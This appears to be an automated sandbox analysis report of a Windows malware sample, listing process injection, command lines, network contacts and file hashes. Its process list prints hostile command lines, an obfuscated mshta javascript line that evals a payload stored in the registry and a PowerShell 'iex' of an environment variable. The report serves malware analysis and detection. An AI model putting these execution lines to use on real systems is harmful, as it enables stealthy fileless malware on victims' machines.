Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3260 wrote to memory of 3944 N/A C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe
PID 3944 wrote to memory of 1924 N/A C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe
PID 1924 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe
PID 5108 wrote to memory of 1740 N/A C:\Windows\system32\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe"

C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe"

C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe

"C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe"

C:\Windows\system32\mshta.exe

"C:\Windows\system32\mshta.exe" javascript:rp80bcfjF="0ctu8uK";Ca90=new%20ActiveXObject("WScript.Shell");Lmo5m="L";hb78ec=Ca90.RegRead("HKLM\\software\\Wow6432Node\\M69god\\kLdp1LW6CD");Vn8mOtRM="qOcQoL";eval(hb78ec);NOM1fM="3S";

C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe

"C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:ndyezgwx

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4324,i,13879737908471496610,15335851594401413307,262144 --variations-seed-version --mojo-platform-channel-handle=1328 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
NL 217.12.208.12:80 217.12.208.12 tcp
US 8.8.8.8:53 79.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 12.208.12.217.in-addr.arpa udp
US 8.8.8.8:53 45.56.20.217.in-addr.arpa udp
US 8.8.8.8:53 24.242.123.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe

MD5 29d53275576b5ded03ed2a1e5dc1f0cf
SHA1 754da96a93a901bd9a2885b438b11989f020621b
SHA256 2bb093ea941ca8237a3e10f73497cf0f5c56982a0419b49d8b10ebd2f582ed6a
SHA512 11d35cf5d0589c589a7ac7ebf8cd44d03ce5a8a6ea078b5b5c0e083dcfdce22bc6d3d2a01a304cfbcec512ec0e9d5178dc1beb6241078de4f3b002a33979a27e

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_catjojr4.h5j.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
